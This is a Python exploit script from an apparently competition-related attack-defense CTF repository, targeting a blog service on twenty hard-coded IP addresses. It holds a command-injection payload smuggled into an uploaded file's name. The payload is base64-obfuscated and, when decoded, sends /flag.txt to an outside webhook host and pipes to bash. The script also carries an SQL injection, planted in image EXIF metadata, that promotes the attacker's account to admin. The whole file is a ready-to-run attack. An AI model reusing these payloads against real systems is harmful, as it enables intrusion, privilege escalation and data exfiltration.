Files
attack-defense-platform/services/blogpost/exploits/grup.py
T
2025-10-26 15:09:49 +07:00

133 lines
4.6 KiB
Python

#!/usr/bin/env python3
import requests
import random
import string
import re
import subprocess
from pathlib import Path
# List of server IPs to test
SERVERS = [
"54.179.69.160", "47.128.239.219", "18.141.25.211", "13.250.48.226",
"52.221.249.62", "52.221.188.80", "13.213.42.191", "54.169.118.58",
"18.141.209.30", "54.169.155.68", "3.0.177.253", "13.250.47.208",
"47.129.37.150", "3.1.222.146", "13.229.198.100", "54.151.150.157",
"13.229.207.1", "18.136.107.63", "52.77.233.125", "18.141.184.213"
]
PORT = "10000"
# Generate random username and password
def generate_random_string(length=8):
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))
# Command injection payload
CMD_PAYLOAD = "tes.png; echo 'cHl0aG9uMyAtYyAiaW1wb3J0IHVybGxpYi5yZXF1ZXN0OyB1cmxsaWIucmVxdWVzdC51cmxvcGVuKCdodHRwczovL3dlYmhvb2suc2l0ZS9hNDM1ZDdhZS02ZDIzLTQwY2ItYTllNy00ZjgwMzk2YzYwNWMnLCBkYXRhPW9wZW4oJy9mbGFnLnR4dCcsICdyYicpLnJlYWQoKSki=' | base64 -d | bash;#.jpg"
# SQLi payload
SQLI_PAYLOAD = "a'; UPDATE users SET role='admin' WHERE username='{}';--"
# Local image files
CMD_IMAGE = "test.png" # For command injection
SQLI_IMAGE = "sqli.png" # For SQLi
def exploit_server(host):
print(f"\nTesting server: {host}")
BASE_URL = f"http://{host}:{PORT}"
REGISTER_URL = BASE_URL + "/register"
LOGIN_URL = BASE_URL + "/login"
CREATE_URL = BASE_URL + "/create"
HOME_URL = BASE_URL + "/"
PROFILE_URL = BASE_URL + "/profile"
# Generate credentials
USERNAME = generate_random_string()
PASSWORD = generate_random_string()
print(f"Generated credentials: Username={USERNAME}, Password={PASSWORD}")
s = requests.Session()
# Step 1: Register a new user
r = s.post(REGISTER_URL, data={"username": USERNAME, "password": PASSWORD})
if r.status_code != 200:
print(f"Registration failed on {host}. Status: {r.status_code}")
return False
print(f"Registered user: {USERNAME}")
# Step 2: Log in
r = s.post(LOGIN_URL, data={"username": USERNAME, "password": PASSWORD})
if r.status_code != 200:
print(f"Login failed on {host}. Status: {r.status_code}")
return False
print(f"Logged in. Cookies: {s.cookies.get_dict()}")
# Step 3: Command injection via filename
cmd_img_path = Path(CMD_IMAGE)
if not cmd_img_path.exists():
print(f"Command injection image {CMD_IMAGE} not found")
return False
with open(cmd_img_path, "rb") as fh:
files = {"image": (CMD_PAYLOAD, fh, "image/jpeg")}
data = {"title": "Command Injection Payload", "content": "CTF attempt"}
r = s.post(CREATE_URL, data=data, files=files)
print(f"Command injection upload status on {host}: {r.status_code}")
print(f"Upload response: {r.text[:800]}")
# Step 4: SQL injection via image metadata
sqli_img_path = Path(SQLI_IMAGE)
if not sqli_img_path.exists():
print(f"SQLi image {SQLI_IMAGE} not found")
return False
try:
subprocess.run([
"exiftool",
"-overwrite_original",
f"-Comment={SQLI_PAYLOAD.format(USERNAME)}",
SQLI_IMAGE
], check=True)
print(f"Modified {SQLI_IMAGE} with SQLi payload")
except subprocess.CalledProcessError as e:
print(f"Failed to modify {SQLI_IMAGE} with exiftool: {e}")
return False
with open(sqli_img_path, "rb") as fh:
files = {"image": (SQLI_IMAGE, fh, "image/png")}
data = {"title": "SQLi Exploit", "content": "Testing SQLi payload"}
r = s.post(CREATE_URL, data=data, files=files)
print(f"SQLi upload status on {host}: {r.status_code}")
# Step 5: Get home page to find newest post ID
r = s.get(HOME_URL)
print(f"Home page status on {host}: {r.status_code}")
post_ids = re.findall(r'/post/(\d+)', r.text)
if post_ids:
max_id = max(map(int, post_ids))
print(f"Newest post ID: {max_id}")
else:
print(f"No post IDs found on {host}")
return False
# Step 6: Check profile for flag
r = s.get(PROFILE_URL)
print(f"Profile page status on {host}: {r.status_code}")
flag_pattern = r"GEMASTIK18\{.*?\}"
flag = re.search(flag_pattern, r.text)
if flag:
print(f"Flag found on {host}: {flag.group(0)}")
return True
else:
print(f"Flag not found on {host}")
return False
def main():
print("Starting CTF Exploit")
for host in SERVERS:
success = exploit_server(host)
if success:
print(f"Exploit succeeded on {host}")
else:
print(f"Exploit failed on {host}")
if __name__ == "__main__":
main()